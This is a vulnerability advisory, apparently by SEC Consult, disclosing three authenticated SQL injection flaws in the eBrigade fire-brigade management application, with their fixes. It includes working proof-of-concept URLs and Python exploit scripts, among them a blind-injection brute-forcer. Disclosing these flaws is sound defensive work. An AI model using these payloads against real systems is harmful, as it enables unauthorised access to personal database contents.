Multiple SQL Injection Vulnerabilities in eBrigade

Project Description

eBrigade contains multiple SQL injection vulnerabilities which can be exploited by an authenticated user. Low privileged users (“public”) can access any data inside the database.


Vendor description

“eBrigade is a web application that allows the management of personnel, vehicles and equipment of rescue centers (fire brigades), associations of first responders and military organizations. Highly configurable, eBrigade can meet the expectations of many other organizations. Skills management, generation of the cover sheet according to availability. Management of the interventions and the victims with assessment sheets rescuers. Private social network. Notifications and alerts by email and SMS. Accounting, reporting and numerous graphs allow precise monitoring of the organization.” (translated)

Source: https://ebrigade.net/

 

Business recommendation

The vendor provides a patch and users of this product are urged to immediately upgrade to the latest version available.

An in-depth security analysis performed by security professionals is highly advised, as the software may be affected from further security issues.

 

Vulnerability overview/description

1) Multiple SQL Injection vulnerabilities

Due to insufficient sanitization of user input an authenticated attacker can execute arbitrary SQL code in several SELECT statements. Since two of the three vulnerabilities are completely unsanitized and responsible to serve ICAL files, an attacker can let a user download manipulated calendar files. Besides that an attacker can also dump the whole database.

The third vulnerability results out of wrong usage of sanitization functions. This enables an attacker to manipulate the SQL query with specially crafted requests resulting into a blind SQL injection, as described in one of the following vulnerabilities.

a) & b) Multiple UNION SQL Injections (CVE-2019-16743, CVE-2019-16744)

The parameters of two links can be manipulated so any arbitrary query to any table or database can be added to the output of the resulting calendar files using the UNION functionality of SQL.

c) Boolean-base Blind SQL Injection (CVE-2019-16745)

The parameters of a search result can be manipulated to guess the returned values of an arbitrary query.

Proof of concept

1) Multiple SQL Injection vulnerabilities

All vulnerabilities were tested with an authenticated user with the lowest access rights (public). The whole PoC script requires an authenticated user for any functionality. The user is authenticated by a PHP session using the cookie PHPSESSID (may vary at different webservers). In conclusion every request described below requires the PHP session cookie.

a) UNION SQL Injection in evenement_ical.php (CVE-2019-16743)

The script evenement_ical.php uses the unsanitized parameter evenement to query the database. The results are written into a downloadable calendar file. By adding a UNION statement, an attacker can extend the output with arbitrary data of the database:

The user input is read on line 42:

$evenement=(isset($_GET['evenement'])?$_GET['evenement']:"");

On line 88-89 it is added to the SQL statement:

if ($evenement !="")
     $sql .= "\n and e.e_code = $evenement ";

Which is executed and fetched in line 136 and 138:

$res = mysqli_query($dbc,$sql);
 while($row=mysqli_fetch_array($res)){

Since e_code is of type integer, the proper sanitization method would be intval().

POC URL
evenement_ical.php?evenement=1+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13,14--
-> Version after ‘LOCATION:’

POC in Python

 import requests
 import string
 import re

 url = input("URL without file (i.e. https://localhost/ebrigade): ")
 phpsession = input("PHPSESSID: ")

 cookies = {'PHPSESSID': phpsession}

 payload = '+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13,14--'

 print("Testing vulnerability")
 r = requests.get('{0}/evenement_ical.php?evenement=1{1}'.format(url, payload), 
 cookies=cookies)

 matches = re.findall( r'^LOCATION:(.*)$', r.text, flags=re.MULTILINE)
 print("Found version: {0}".format(matches[-1]))

b) UNION SQL Injection in evenements.php (CVE-2019-16744)

The script evenements.php uses the unsanitized parameter cid to query the database. The results are written into a downloadable calendar file. By breaking out of the string and adding a UNION statement, an attacker can extend the output with arbitrary data. But the parameter cid must start with a valid cid.

The user input is read on line 48:

$key = (isset($_GET['cid'])?$_GET['cid']:"");

On line 69 it is inserted as SQL string into the query:

 $sqlp="select p.p_id, p.p_nom, p.p_prenom, p.p_code, p.p_mdp ,p.p_calendar, 
 p.p_section section, s.s_code,
 md5(concat(p.p_id,'-',p.p_nom,'-',p.p_mdp)) keyp
 from pompier p , section s
 where p.p_fin is null
 and p.p_section = s.s_id
 and md5(concat(p.p_id,'-',p.p_nom,'-',p.p_mdp)) = '$key'

Which is executed and fetched on line 72 and 73:

 $resp = mysqli_query($dbc,$sqlp);
 while($rowp= mysqli_fetch_array($resp)){

Here an attacker can add arbitrary SQL code by breaking out of the string.
Since the expected value is of type string, the proper sanitization method
would be mysqli_real_escape_string().

POC URL
evenements.php?cid=%27+union+select+1,2,3,4,5,6,7,version(),%279
-> Version can be found in X-WR-CALNAME

POC in Python

 import requests
 import string
 import re

 url = input("URL without file (i.e. https://localhost/ebrigade): ")
 phpsession = input("PHPSESSID: ")
 valid_cid = input("Valid CID: ")

 cookies = {'PHPSESSID': phpsession}

 payload = '%27+union+select+1,2,3,4,5,6,7,version(),%279'

 print("Testing vulnerability")
 r = requests.get('{0}/evenements.php?cid={1}{2}'.format(url, valid_cid, payload), cookies=cookies)

 matches = re.findall( r'^X-WR-CALNAME:(.*) - (.*)$', r.text, flags=re.MULTILINE)
 print("Found version: {0}".format(matches[0][1]))

c) Blind SQL Injection in evenement_choice.php (CVE-2019-16745)

The script evenement_choice.php uses the wrongly sanitized parameter chxCal as an array to query the database. The results are shown in a search result. By breaking out, an attacker can extend the query’s condition to guess or brute arbitrary data.

The user input is read on line 108:

 $ChxCalendar = (isset($_GET['btGo'])?(isset($_GET['chxCal'])?$_GET['chxCal']
 :array()):$chxCal);

On line 169 it is added to the statement by joining the array elements and wrongly sanitizing it with mysqli_real_escape_string():

 $query .= "\n and S.S_ID in (".get_family("$filter").(count($ChxCalendar)>0?",
 ".mysqli_real_escape_string($dbc,implode(",",$ChxCalendar)):"").")";

Which is executed on line 202:

$result=mysqli_query($dbc,$query);

Here an attacker can add arbitrary SQL code – except quotations – by breaking out of the list. Since the expected value of each element is of type integer, the proper sanitization method would be intval() for each array element.

POC URL
evenement_choice.php?ec_mode=default&page=1&btGo=1&chxCal[0]=5)+and+(ord(substring(version(),0,1))+%3D+49
-> Would return the search results in case the version starts with 1 (since the ASCII value of 1 is 49).

POC in Python

 import requests
 import string

 url = input("URL without file (i.e. https://localhost/ebrigade): ")
 phpsession = input("PHPSESSID: ")

 true_payload = ')+and+(1%3D1'
 false_payload = ')+and+(1%3D0'

 cookies = {'PHPSESSID': phpsession}

 print("Testing vulnerability")
 r = requests.get('{0}/evenement_choice.php?ec_mode=default&page=1&btGo=1&chxCal[0]=5{1}'.format(url, true_payload), cookies=cookies)
 true_len = len(r.text)
 r = requests.get('{0}/evenement_choice.php?ec_mode=default&page=1&btGo=1&chxCal[0]=5{1}'.format(url, false_payload), cookies=cookies)
 false_len = len(r.text)

 if (true_len > false_len):
     print("Vulnerability verified.")

     # get string length 
     version_len = 0
     while len(requests.get('{0}/evenement_choice.php?ec_mode=default&page=1&btGo=1&chxCal[0]=5)+and+(length(version())+%3D+{1}'.format(url, version_len),  
      cookies=cookies).text) == false_len:
         version_len += 1
     print("Version string has {0} characters.".format(version_len))

     # brute version
     version_string = ''
     for i in range(version_len):
         print("Bruting position {0}".format(i+1))
         chars = string.ascii_lowercase + string.ascii_uppercase + string.digits + '.-'
         for c in chars:
             if len(requests.get('{0}/evenement_choice.php?ec_mode=default&page=1&btGo=1&chxCal[0]=5)+and+(ord(substring(version(),{1},1))+%3D+{2}'.format(url,    
             i+1, ord(c)), cookies=cookies).text) > false_len:
                 version_string += c
                 print("Found new char of version: {0}".format(version_string))
                 continue
     print("Found version: {0}".format(version_string))

 else:
     print("Could not verify Vulnerability.")

Vulnerable / tested versions:

The following versions were tested and found to be vulnerable:
– 4.5.1
– 4.5
– 4.4
– 4.3
– 4.2
– 4.1
– 4.0

Vendor contact timeline

 

2019-06-04Contacting vendor through https://ebrigade.net/contact/
2019-06-15Vendor replies to send advisory via unencrypted email
2019-06-17Vendor acknowledges receipt, plans to release eBrigade version 5.0 security improvements soon
2019-07-02Asking vendor for a status update
Vendor: the new release 5.0 will “likely be available next month”
2019-08-14Asking for a status update; no reply
2019-08-29Set the release date to 2019-09-26, since release of the fixed version should be this month and no answer on news was received by the vendor
2019-09-23Checking the vendor website, verification that a new version has already been released which fixes the issues.
2019-09-26Public release of security advisory.

Solution

The vendor provides an updated version (v5.0 or higher, v5.0.1) which should be installed immediately:

https://sourceforge.net/projects/ebrigade/files/

Workaround

None.

 

Advisory URL

https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

 

EOF David Haintz/ @2019

 

Interested to work with the experts of SEC Consult? Send us your application.
Want to improve your own cyber security with the experts of SEC Consult?
Contact our local offices.

Project Details

  • TitleMultiple SQL Injection vulnerabilities
  • ProducteBrigade
  • Vulnerable version<5.0
  • Fixed version>= 5.0
  • CVE numberCVE-2019-16743, CVE-2019-16744, CVE-2019-16745
  • Impactcritical
  • Homepage https://ebrigade.net
  • Found2019-06-06
  • ByDavid Haintz (Office Vienna) | SEC Consult Vulnerability Lab

Cookie Preference

Please select an option. You can find more information about the consequences of your choice at Help.

Select an option to continue

Your selection was saved!

Help

Help

To continue, you must make a cookie selection. Below is an explanation of the different options and their meaning.

  • Accept all cookies:
    All cookies such as tracking and analytics cookies.
  • Accept first-party cookies only:
    Only cookies from this website.
  • Reject all tracking cookies:
    No cookies except for those necessary for technical reasons are set.

You can change your cookie setting here anytime: Blog. Blog

Back